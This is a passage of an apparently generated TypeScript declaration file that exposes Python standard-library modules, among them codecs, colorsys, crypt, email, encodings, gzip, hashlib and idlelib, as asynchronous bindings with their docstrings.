\n\t\t * size indicates the approximate maximum number of decoded\n\t\t * bytes or code points to read for decoding. The decoder\n\t\t * can modify this setting as appropriate. The default value\n\t\t * -1 indicates to read and decode as much as possible. size\n\t\t * is intended to prevent having to decode huge files in one\n\t\t * step.\n\t\t * \n\t\t * If firstline is true, and a UnicodeDecodeError happens\n\t\t * after the first line terminator in the input only the first line\n\t\t * will be returned, the rest of the input will be kept until the\n\t\t * next call to read().\n\t\t * \n\t\t * The method should use a greedy read strategy, meaning that\n\t\t * it should read as much data as is allowed within the\n\t\t * definition of the encoding and the given size, e.g. if\n\t\t * optional encoding endings or state markers are available\n\t\t * on the stream, these should be read too.\n\t\t * \n\t\t */\n\t\tread(size?, chars?, firstline?: boolean): Promise<any>\n\t\tread$({ size, chars, firstline }: { size?, chars?, firstline?}): Promise<any>\n\n\t\t/**\n\t\t * Read one line from the input stream and return the\n\t\t * decoded data.\n\t\t * \n\t\t * size, if given, is passed as size argument to the\n\t\t * read() method.\n\t\t * \n\t\t * \n\t\t */\n\t\treadline(size?, keepends?: boolean): Promise<any>\n\t\treadline$({ size, keepends }: { size?, keepends?}): Promise<any>\n\n\t\t/**\n\t\t * Read all lines available on the input stream\n\t\t * and return them as a list.\n\t\t * \n\t\t * Line breaks are implemented using the codec's decoder\n\t\t * method and are included in the list entries.\n\t\t * \n\t\t * sizehint, if given, is ignored since there is no efficient\n\t\t * way to finding the true end-of-line.\n\t\t * \n\t\t * \n\t\t */\n\t\treadlines(sizehint?, keepends?: boolean): Promise<any>\n\t\treadlines$({ sizehint, keepends }: { sizehint?, keepends?}): Promise<any>\n\n\t\t/**\n\t\t * Resets the codec buffers used for keeping internal state.\n\t\t * \n\t\t * Note that no stream repositioning should take place.\n\t\t * This method is primarily intended to be able to recover\n\t\t * from decoding errors.\n\t\t * \n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the input stream's current position.\n\t\t * \n\t\t * Resets the codec buffers used for keeping state.\n\t\t * \n\t\t */\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\tcharbuffertype\n\t}\n\n\t/**\n\t * StreamReaderWriter instances allow wrapping streams which\n\t * work in both read and write modes.\n\t * \n\t * The design is such that one can use the factory functions\n\t * returned by the codec.lookup() function to construct the\n\t * instance.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Creates a StreamReaderWriter instance.\n\t * \n\t * stream must be a Stream-like object.\n\t * \n\t * Reader, Writer must be factory functions or classes\n\t * providing the StreamReader, StreamWriter interface resp.\n\t * \n\t * Error handling is done in the same way as defined for the\n\t * StreamWriter/Readers.\n\t * \n\t * \n\t */\n\tfunction StreamReaderWriter(stream, Reader, Writer, errors?): Promise<IStreamReaderWriter>\n\tfunction StreamReaderWriter$({ stream, Reader, Writer, errors }: { stream, Reader, Writer, errors?}): Promise<IStreamReaderWriter>\n\tinterface IStreamReaderWriter {\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\t\treadline(size?): Promise<any>\n\t\treadline$({ size }: { size?}): Promise<any>\n\t\treadlines(sizehint?): Promise<any>\n\t\treadlines$({ sizehint }: { sizehint?}): Promise<any>\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\twritelines(list): Promise<any>\n\t\twritelines$({ list }): Promise<any>\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\tencoding\n\t}\n\n\t/**\n\t * StreamRecoder instances translate data from one encoding to another.\n\t * \n\t * They use the complete set of APIs returned by the\n\t * codecs.lookup() function to implement their task.\n\t * \n\t * Data written to the StreamRecoder is first decoded into an\n\t * intermediate format (depending on the \"decode\" codec) and then\n\t * written to the underlying stream using an instance of the provided\n\t * Writer class.\n\t * \n\t * In the other direction, data is read from the underlying stream using\n\t * a Reader instance and then encoded and returned to the caller.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Creates a StreamRecoder instance which implements a two-way\n\t * conversion: encode and decode work on the frontend (the\n\t * data visible to .read() and .write()) while Reader and Writer\n\t * work on the backend (the data in stream).\n\t * \n\t * You can use these objects to do transparent\n\t * transcodings from e.g. latin-1 to utf-8 and back.\n\t * \n\t * stream must be a file-like object.\n\t * \n\t * encode and decode must adhere to the Codec interface; Reader and\n\t * Writer must be factory functions or classes providing the\n\t * StreamReader and StreamWriter interfaces resp.\n\t * \n\t * Error handling is done in the same way as defined for the\n\t * StreamWriter/Readers.\n\t * \n\t * \n\t */\n\tfunction StreamRecoder(stream, encode, decode, Reader, Writer, errors?): Promise<IStreamRecoder>\n\tfunction StreamRecoder$({ stream, encode, decode, Reader, Writer, errors }: { stream, encode, decode, Reader, Writer, errors?}): Promise<IStreamRecoder>\n\tinterface IStreamRecoder {\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\t\treadline(size?): Promise<any>\n\t\treadline$({ size }: { size?}): Promise<any>\n\t\treadlines(sizehint?): Promise<any>\n\t\treadlines$({ sizehint }: { sizehint?}): Promise<any>\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\twritelines(list): Promise<any>\n\t\twritelines$({ list }): Promise<any>\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\tdata_encoding\n\t\tfile_encoding\n\t}\n\tlet BOM_UTF8: Promise<any>\n\tlet BOM_LE: Promise<any>\n\tlet BOM_UTF16_LE: Promise<any>\n\tlet BOM_BE: Promise<any>\n\tlet BOM_UTF16_BE: Promise<any>\n\tlet BOM_UTF32_LE: Promise<any>\n\tlet BOM_UTF32_BE: Promise<any>\n\tlet BOM: Promise<any>\n\tlet BOM_UTF16: Promise<any>\n\tlet BOM_UTF32: Promise<any>\n\tlet BOM32_LE: Promise<any>\n\tlet BOM32_BE: Promise<any>\n\tlet BOM64_LE: Promise<any>\n\tlet BOM64_BE: Promise<any>\n\tlet strict_errors: Promise<any>\n\tlet ignore_errors: Promise<any>\n\tlet replace_errors: Promise<any>\n\tlet xmlcharrefreplace_errors: Promise<any>\n\tlet backslashreplace_errors: Promise<any>\n\tlet namereplace_errors: Promise<any>\n}\ndeclare module colorsys {\n\tvar _\n\tfunction rgb_to_yiq(r, g, b): Promise<any>\n\tfunction rgb_to_yiq$({ r, g, b }): Promise<any>\n\tfunction yiq_to_rgb(y, i, q): Promise<any>\n\tfunction yiq_to_rgb$({ y, i, q }): Promise<any>\n\tfunction rgb_to_hls(r, g, b): Promise<any>\n\tfunction rgb_to_hls$({ r, g, b }): Promise<any>\n\tfunction hls_to_rgb(h, l, s): Promise<any>\n\tfunction hls_to_rgb$({ h, l, s }): Promise<any>\n\tfunction rgb_to_hsv(r, g, b): Promise<any>\n\tfunction rgb_to_hsv$({ r, g, b }): Promise<any>\n\tfunction hsv_to_rgb(h, s, v): Promise<any>\n\tfunction hsv_to_rgb$({ h, s, v }): Promise<any>\n\tlet ONE_THIRD: Promise<any>\n\tlet ONE_SIXTH: Promise<any>\n\tlet TWO_THIRD: Promise<any>\n}\ndeclare module crypt {\n\tvar _\n\n\t/**\n\t * Generate a salt for the specified method.\n\t * \n\t * If not specified, the strongest available method will be used.\n\t * \n\t * \n\t */\n\tfunction mksalt(method?): Promise<any>\n\tfunction mksalt$({ method }: { method?}): Promise<any>\n\n\t/**\n\t * Return a string representing the one-way hash of a password, with a salt\n\t * prepended.\n\t * \n\t * If ``salt`` is not specified or is ``None``, the strongest\n\t * available method will be selected and a salt generated. Otherwise,\n\t * ``salt`` may be one of the ``crypt.METHOD_*`` values, or a string as\n\t * returned by ``crypt.mksalt()``.\n\t * \n\t * \n\t */\n\tfunction crypt(word, salt?): Promise<any>\n\tfunction crypt$({ word, salt }: { word, salt?}): Promise<any>\n\n\t/**\n\t * Class representing a salt method per the Modular Crypt Format or the\n\t * legacy 2-character crypt method.\n\t */\n\tinterface I_Method {\n\t}\n\tlet methods: Promise<any>\n}\ndeclare module decimal {\n\tvar _\n}\ndeclare module email {\n\tmodule base64mime {\n\t\tvar _\n\n\t\t/**\n\t\t * Return the length of s when it is encoded with base64.\n\t\t */\n\t\tfunction header_length(bytearray): Promise<any>\n\t\tfunction header_length$({ bytearray }): Promise<any>\n\n\t\t/**\n\t\t * Encode a single header line with Base64 encoding in a given charset.\n\t\t * \n\t\t * charset names the character set to use to encode the header. It defaults\n\t\t * to iso-8859-1. Base64 encoding is defined in RFC 2045.\n\t\t * \n\t\t */\n\t\tfunction header_encode(header_bytes, charset?): Promise<any>\n\t\tfunction header_encode$({ header_bytes, charset }: { header_bytes, charset?}): Promise<any>\n\n\t\t/**\n\t\t * Encode a string with base64.\n\t\t * \n\t\t * Each line will be wrapped at, at most, maxlinelen characters (defaults to\n\t\t * 76 characters).\n\t\t * \n\t\t * Each line of encoded text will end with eol, which defaults to \"\\n\". Set\n\t\t * this to \"\\r\\n\" if you will be using the result of this function directly\n\t\t * in an email.\n\t\t * \n\t\t */\n\t\tfunction body_encode(s, maxlinelen?, eol?): Promise<any>\n\t\tfunction body_encode$({ s, maxlinelen, eol }: { s, maxlinelen?, eol?}): Promise<any>\n\n\t\t/**\n\t\t * Decode a raw base64 string, returning a bytes object.\n\t\t * \n\t\t * This function does not parse a full MIME header value encoded with\n\t\t * base64 (like =?iso-8859-1?b?bmloISBuaWgh?=) -- please use the high\n\t\t * level email.header class for that functionality.\n\t\t * \n\t\t */\n\t\tfunction decode(string): Promise<any>\n\t\tfunction decode$({ string }): Promise<any>\n\t\tlet CRLF: Promise<any>\n\t\tlet NL: Promise<any>\n\t\tlet EMPTYSTRING: Promise<any>\n\t\tlet MISC_LEN: Promise<any>\n\t\tlet body_decode: Promise<any>\n\t\tlet decodestring: Promise<any>\n\t}\n}\ndeclare module encodings {\n\tmodule base64_codec {\n\t\tvar _\n\t\tfunction base64_encode(input, errors?): Promise<any>\n\t\tfunction base64_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction base64_decode(input, errors?): Promise<any>\n\t\tfunction base64_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n\tmodule bz2_codec {\n\t\tvar _\n\t\tfunction bz2_encode(input, errors?): Promise<any>\n\t\tfunction bz2_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction bz2_decode(input, errors?): Promise<any>\n\t\tfunction bz2_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tfunction IncrementalEncoder(errors?): Promise<IIncrementalEncoder>\n\t\tfunction IncrementalEncoder$({ errors }: { errors?}): Promise<IIncrementalEncoder>\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t\treset(): Promise<any>\n\t\t\treset$($: {}): Promise<any>\n\t\t}\n\t\tfunction IncrementalDecoder(errors?): Promise<IIncrementalDecoder>\n\t\tfunction IncrementalDecoder$({ errors }: { errors?}): Promise<IIncrementalDecoder>\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t\treset(): Promise<any>\n\t\t\treset$($: {}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n\tmodule hex_codec {\n\t\tvar _\n\t\tfunction hex_encode(input, errors?): Promise<any>\n\t\tfunction hex_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction hex_decode(input, errors?): Promise<any>\n\t\tfunction hex_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n\tmodule palmos {\n\t\tvar _\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t\tlet decoding_table: Promise<any>\n\t\tlet encoding_table: Promise<any>\n\t}\n\tmodule quopri_codec {\n\t\tvar _\n\t\tfunction quopri_encode(input, errors?): Promise<any>\n\t\tfunction quopri_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction quopri_decode(input, errors?): Promise<any>\n\t\tfunction quopri_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n\tmodule uu_codec {\n\t\tvar _\n\t\tfunction uu_encode(input, errors?, filename?, mode?): Promise<any>\n\t\tfunction uu_encode$({ input, errors, filename, mode }: { input, errors?, filename?, mode?}): Promise<any>\n\t\tfunction uu_decode(input, errors?): Promise<any>\n\t\tfunction uu_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n\tmodule zlib_codec {\n\t\tvar _\n\t\tfunction zlib_encode(input, errors?): Promise<any>\n\t\tfunction zlib_encode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction zlib_decode(input, errors?): Promise<any>\n\t\tfunction zlib_decode$({ input, errors }: { input, errors?}): Promise<any>\n\t\tfunction getregentry(): Promise<any>\n\t\tfunction getregentry$($: {}): Promise<any>\n\t\tinterface ICodec {\n\t\t\tencode(input, errors?): Promise<any>\n\t\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t\tdecode(input, errors?): Promise<any>\n\t\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t\t}\n\t\tfunction IncrementalEncoder(errors?): Promise<IIncrementalEncoder>\n\t\tfunction IncrementalEncoder$({ errors }: { errors?}): Promise<IIncrementalEncoder>\n\t\tinterface IIncrementalEncoder {\n\t\t\tencode(input, final?: boolean): Promise<any>\n\t\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\t\treset(): Promise<any>\n\t\t\treset$($: {}): Promise<any>\n\t\t}\n\t\tfunction IncrementalDecoder(errors?): Promise<IIncrementalDecoder>\n\t\tfunction IncrementalDecoder$({ errors }: { errors?}): Promise<IIncrementalDecoder>\n\t\tinterface IIncrementalDecoder {\n\t\t\tdecode(input, final?: boolean): Promise<any>\n\t\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\t\treset(): Promise<any>\n\t\t\treset$($: {}): Promise<any>\n\t\t}\n\t\tinterface IStreamWriter extends ICodec {\n\t\t\tcharbuffertype\n\t\t}\n\t\tinterface IStreamReader extends ICodec {\n\t\t}\n\t}\n}\ndeclare module export {\n\tvar _\n\tfunction export_json(tree, pretty_print ?: boolean): Promise < any >\n\tfunction export_json$({ tree, pretty_print }: { tree, pretty_print?}): Promise<any>\n\tfunction export_dict(tree): Promise<any>\nfunction export_dict$({ tree }): Promise<any>\ninterface IDictExportVisitor {\n\tvisit(node): Promise<any>\n\tvisit$({ node }): Promise<any>\n\tdefault_visit(node): Promise<any>\n\tdefault_visit$({ node }): Promise<any>\n\tdefault_visit_field(val): Promise<any>\n\tdefault_visit_field$({ val }): Promise<any>\n\tvisit_str(val): Promise<any>\n\tvisit_str$({ val }): Promise<any>\n\tvisit_Bytes(val): Promise<any>\n\tvisit_Bytes$({ val }): Promise<any>\n\tvisit_NoneType(val): Promise<any>\n\tvisit_NoneType$({ val }): Promise<any>\n\tvisit_field_NameConstant_value(val): Promise<any>\n\tvisit_field_NameConstant_value$({ val }): Promise<any>\n\tvisit_field_Num_n(val): Promise<any>\n\tvisit_field_Num_n$({ val }): Promise<any>\n\tast_type_field\n}\n}\ndeclare module gzip {\n\tvar _\n\n\t/**\n\t * Open a gzip-compressed file in binary or text mode.\n\t * \n\t * The filename argument can be an actual filename (a str or bytes object), or\n\t * an existing file object to read from or write to.\n\t * \n\t * The mode argument can be \"r\", \"rb\", \"w\", \"wb\", \"x\", \"xb\", \"a\" or \"ab\" for\n\t * binary mode, or \"rt\", \"wt\", \"xt\" or \"at\" for text mode. The default mode is\n\t * \"rb\", and the default compresslevel is 9.\n\t * \n\t * For binary mode, this function is equivalent to the GzipFile constructor:\n\t * GzipFile(filename, mode, compresslevel). In this case, the encoding, errors\n\t * and newline arguments must not be provided.\n\t * \n\t * For text mode, a GzipFile object is created, and wrapped in an\n\t * io.TextIOWrapper instance with the specified encoding, error handling\n\t * behavior, and line ending(s).\n\t * \n\t * \n\t */\n\tfunction open(filename, mode?, compresslevel?, encoding?, errors?, newline?): Promise<any>\n\tfunction open$({ filename, mode, compresslevel, encoding, errors, newline }: { filename, mode?, compresslevel?, encoding?, errors?, newline?}): Promise<any>\n\tfunction write32u(output, value): Promise<any>\n\tfunction write32u$({ output, value }): Promise<any>\n\n\t/**\n\t * Compress data in one shot and return the compressed string.\n\t * Optional argument is the compression level, in range of 0-9.\n\t * \n\t */\n\tfunction compress(data, compresslevel?): Promise<any>\n\tfunction compress$({ data, compresslevel }: { data, compresslevel?}): Promise<any>\n\n\t/**\n\t * Decompress a gzip compressed string in one shot.\n\t * Return the decompressed string.\n\t * \n\t */\n\tfunction decompress(data): Promise<any>\n\tfunction decompress$({ data }): Promise<any>\n\tfunction main(): Promise<any>\n\tfunction main$($: {}): Promise<any>\n\n\t/**\n\t * Minimal read-only file object that prepends a string to the contents\n\t * of an actual file. Shouldn't be used outside of gzip.py, as it lacks\n\t * essential functionality.\n\t */\n\tinterface I_PaddedFile {\n\t\tread(size): Promise<any>\n\t\tread$({ size }): Promise<any>\n\t\tprepend(prepend?): Promise<any>\n\t\tprepend$({ prepend }: { prepend?}): Promise<any>\n\t\tseek(off): Promise<any>\n\t\tseek$({ off }): Promise<any>\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Exception raised in some cases for invalid gzip files.\n\t */\n\tinterface IBadGzipFile {\n\t}\n\n\t/**\n\t * The GzipFile class simulates most of the methods of a file object with\n\t * the exception of the truncate() method.\n\t * \n\t * This class only supports opening files in binary mode. If you need to open a\n\t * compressed file in text mode, use the gzip.open() function.\n\t * \n\t * \n\t */\n\n\t/**\n\t * Constructor for the GzipFile class.\n\t * \n\t * At least one of fileobj and filename must be given a\n\t * non-trivial value.\n\t * \n\t * The new class instance is based on fileobj, which can be a regular\n\t * file, an io.BytesIO object, or any other object which simulates a file.\n\t * It defaults to None, in which case filename is opened to provide\n\t * a file object.\n\t * \n\t * When fileobj is not None, the filename argument is only used to be\n\t * included in the gzip file header, which may include the original\n\t * filename of the uncompressed file. It defaults to the filename of\n\t * fileobj, if discernible; otherwise, it defaults to the empty string,\n\t * and in this case the original filename is not included in the header.\n\t * \n\t * The mode argument can be any of 'r', 'rb', 'a', 'ab', 'w', 'wb', 'x', or\n\t * 'xb' depending on whether the file will be read or written. The default\n\t * is the mode of fileobj if discernible; otherwise, the default is 'rb'.\n\t * A mode of 'r' is equivalent to one of 'rb', and similarly for 'w' and\n\t * 'wb', 'a' and 'ab', and 'x' and 'xb'.\n\t * \n\t * The compresslevel argument is an integer from 0 to 9 controlling the\n\t * level of compression; 1 is fastest and produces the least compression,\n\t * and 9 is slowest and produces the most compression. 0 is no compression\n\t * at all. The default is 9.\n\t * \n\t * The mtime argument is an optional numeric timestamp to be written\n\t * to the last modification time field in the stream when compressing.\n\t * If omitted or None, the current time is used.\n\t * \n\t * \n\t */\n\tfunction GzipFile(filename?, mode?, compresslevel?, fileobj?, mtime?): Promise<IGzipFile>\n\tfunction GzipFile$({ filename, mode, compresslevel, fileobj, mtime }: { filename?, mode?, compresslevel?, fileobj?, mtime?}): Promise<IGzipFile>\n\tinterface IGzipFile {\n\t\tfilename(): Promise<any>\n\t\tfilename$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Last modification time read from stream, or None\n\t\t */\n\t\tmtime(): Promise<any>\n\t\tmtime$($: {}): Promise<any>\n\t\twrite(data): Promise<any>\n\t\twrite$({ data }): Promise<any>\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\n\t\t/**\n\t\t * Implements BufferedIOBase.read1()\n\t\t * \n\t\t * Reads up to a buffer's worth of data if size is negative.\n\t\t */\n\t\tread1(size?): Promise<any>\n\t\tread1$({ size }: { size?}): Promise<any>\n\t\tpeek(n): Promise<any>\n\t\tpeek$({ n }): Promise<any>\n\t\tclosed(): Promise<any>\n\t\tclosed$($: {}): Promise<any>\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t\tflush(zlib_mode?): Promise<any>\n\t\tflush$({ zlib_mode }: { zlib_mode?}): Promise<any>\n\n\t\t/**\n\t\t * Invoke the underlying file object's fileno() method.\n\t\t * \n\t\t * This will raise AttributeError if the underlying file object\n\t\t * doesn't support fileno().\n\t\t * \n\t\t */\n\t\tfileno(): Promise<any>\n\t\tfileno$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the uncompressed stream file position indicator to the\n\t\t * beginning of the file\n\t\t */\n\t\trewind(): Promise<any>\n\t\trewind$($: {}): Promise<any>\n\t\treadable(): Promise<any>\n\t\treadable$($: {}): Promise<any>\n\t\twritable(): Promise<any>\n\t\twritable$($: {}): Promise<any>\n\t\tseekable(): Promise<any>\n\t\tseekable$($: {}): Promise<any>\n\t\tseek(offset, whence?): Promise<any>\n\t\tseek$({ offset, whence }: { offset, whence?}): Promise<any>\n\t\treadline(size?): Promise<any>\n\t\treadline$({ size }: { size?}): Promise<any>\n\t\tmyfileobj\n\t}\n\tinterface I_GzipReader {\n\t\tread(size?): Promise<any>\n\t\tread$({ size }: { size?}): Promise<any>\n\t}\n}\ndeclare module hashlib {\n\tvar _\n\tlet algorithms_guaranteed: Promise<any>\n\tlet algorithms_available: Promise<any>\n\tlet new$: Promise<any>\n}\ndeclare module idlelib {\n\tmodule codecontext {\n\t\tvar _\n\n\t\t/**\n\t\t * Extract the beginning whitespace and first word from codeline.\n\t\t */\n\t\tfunction get_spaces_firstword(codeline, c?): Promise<any>\n\t\tfunction get_spaces_firstword$({ codeline, c }: { codeline, c?}): Promise<any>\n\n\t\t/**\n\t\t * Return tuple of (line indent value, codeline, block start keyword).\n\t\t * \n\t\t * The indentation of empty lines (or comment lines) is INFINITY.\n\t\t * If the line does not start a block, the keyword value is False.\n\t\t * \n\t\t */\n\t\tfunction get_line_info(codeline): Promise<any>\n\t\tfunction get_line_info$({ codeline }): Promise<any>\n\n\t\t/**\n\t\t * Display block context above the edit window.\n\t\t */\n\n\t\t/**\n\t\t * Initialize settings for context block.\n\t\t * \n\t\t * editwin is the Editor window for the context block.\n\t\t * self.text is the editor window text widget.\n\t\t * \n\t\t * self.context displays the code context text above the editor text.\n\t\t * Initially None, it is toggled via <<toggle-code-context>>.\n\t\t * self.topvisible is the number of the top text line displayed.\n\t\t * self.info is a list of (line number, indent level, line text,\n\t\t * block keyword) tuples for the block structure above topvisible.\n\t\t * self.info[0] is initialized with a 'dummy' line which\n\t\t * starts the toplevel 'block' of the module.\n\t\t * \n\t\t * self.t1 and self.t2 are two timer events on the editor text widget to\n\t\t * monitor for changes to the context text or editor font.\n\t\t * \n\t\t */\n\t\tfunction CodeContext(editwin): Promise<ICodeContext>\n\t\tfunction CodeContext$({ editwin }): Promise<ICodeContext>\n\t\tinterface ICodeContext {\n\n\t\t\t/**\n\t\t\t * Load class variables from config.\n\t\t\t */\n\t\t\treload(): Promise<any>\n\t\t\treload$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Toggle code context display.\n\t\t\t * \n\t\t\t * If self.context doesn't exist, create it to match the size of the editor\n\t\t\t * window text (toggle on). If it does exist, destroy it (toggle off).\n\t\t\t * Return 'break' to complete the processing of the binding.\n\t\t\t * \n\t\t\t */\n\t\t\ttoggle_code_context_event(event?): Promise<any>\n\t\t\ttoggle_code_context_event$({ event }: { event?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return a list of block line tuples and the 'last' indent.\n\t\t\t * \n\t\t\t * The tuple fields are (linenum, indent, text, opener).\n\t\t\t * The list represents header lines from new_topvisible back to\n\t\t\t * stopline with successively shorter indents > stopindent.\n\t\t\t * The list is returned ordered by line number.\n\t\t\t * Last indent returned is the smallest indent observed.\n\t\t\t * \n\t\t\t */\n\t\t\tget_context(new_topvisible, stopline?, stopindent?): Promise<any>\n\t\t\tget_context$({ new_topvisible, stopline, stopindent }: { new_topvisible, stopline?, stopindent?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Update context information and lines visible in the context pane.\n\t\t\t * \n\t\t\t * No update is done if the text hasn't been scrolled. If the text\n\t\t\t * was scrolled, the lines that should be shown in the context will\n\t\t\t * be retrieved and the context area will be updated with the code,\n\t\t\t * up to the number of maxlines.\n\t\t\t * \n\t\t\t */\n\t\t\tupdate_code_context(): Promise<any>\n\t\t\tupdate_code_context$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Show clicked context line at top of editor.\n\t\t\t * \n\t\t\t * If a selection was made, don't jump; allow copying.\n\t\t\t * If no visible context, show the top line of the file.\n\t\t\t * \n\t\t\t */\n\t\t\tjumptoline(event?): Promise<any>\n\t\t\tjumptoline$({ event }: { event?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Event on editor text widget triggered every UPDATEINTERVAL ms.\n\t\t\t */\n\t\t\ttimer_event(): Promise<any>\n\t\t\ttimer_event$($: {}): Promise<any>\n\t\t\tupdate_font(): 